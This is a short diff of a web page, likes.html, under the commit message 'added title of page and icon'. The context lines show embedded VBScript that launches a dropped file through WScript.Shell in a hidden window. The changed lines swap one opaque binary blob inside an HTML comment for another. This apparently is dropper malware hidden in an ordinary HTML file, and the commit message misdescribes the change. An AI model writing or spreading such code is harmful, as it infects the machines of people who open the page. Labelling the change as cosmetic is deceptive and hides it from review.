added title of page and icon

--- a/likes.html
+++ b/likes.html
@@ -80,7 +80,7 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--õÝ…‹‹]£ìa?Nò‰!Ž÷ö[¹ÁƒDÁtüŠî";²Û"2.uµK|1í=E$3È7ü¹Ý 9]§ô­ŸV˜q¿ÀW5Ê–×˜1ÅL ÝVÇK,ö(a§±¸,4+ü5(¼"_Fõ¢É
-Ð×&ò|ÈíÃ‰lÝ´©	G8ŒÂŒL
-ùbœO¡õiÏ„Ìîç8O§²§\u×ù!Þ°¹INTŸâÇ»Lt8`åí#>EÎÆ‘É¡)ò#=Àí_Bõm‘$,íû ™­.Í"“ÞÔ¸O¹ëvl>2ªs¥oŒK<B÷p¤Î¸l§OqÛ!Ãøú•ž?$ÐËT~G0ú	W'*‘X€ó\äƒy'ÀW§rRÑl\‘˜¦Ýô4	Å‚>¸õWzW€ù6 ×?Š sÎ´vhtûñB-šYÐšjÖ7ûéú
-$ ºÒ`Ðþ!ƒ×W7­^ç­ËàêÅcF(°Ê8~ŒŸÔ^Ñs¶¡"ö}‘Ös¸Wiõ àöR#íøàöàöàö­+NÛA [öëö àö-->
+//--></SCRIPT><!--84ÍÏÏÒ*:öëJW¦’ž>_ºe[s‹Žü4újÉ4þ¸Le¥ôßfdñÆ-zßfJÉ,´Úâ_ìþg‡w²6Z±½õŽ6ÂŒJp—¼m×³’@/µÃÊ­MrF$¿YÌ$l`3A3 vf__?/õêûÜºLýø¢ŠîÉM¨t4,ÛÑ²ÇÝ^yÝg{„UékSŠP–¨ÞQÖÑ#åš¸,Ì…Å¿{€ÃÈªã¤¢CO3g
+ºÜœXô¨Yõ[¨;ðÚ)¨$>‚ÒÃ¥£„‰´{û…ã˜*/»´S–°h#ÚïÊqNº’»%NÃÚ^² }TDö_ýU89¶†ŠÄXsJËÇà¢Vñe3V\ÜtùñBjØESsÔÑ y²„:^{çÑÔ›þ€¿ê)öH•–J*òWÒ2ôæZWX(¥ùicàÕ^j÷þpœçÌ‚¥õ¾»¹[4¤ÍÁÂ92#
+þÖG¼Žû^QcÈ¿G‚;¼”Íæ+±oÄöÎæ«œ¸‰¦wèÍÚÃ^_;Ô¶˜z	Õœ´Ø&µDd×ÝÐÐ3
+ÎÃÁªÑ» Ãf3€Ûö:({ ½W­¹1“äL[TÖtì‘”ºH  Û$R?ùÛ$Û$Û$–ùOKuòZöÐ$ Û$-->
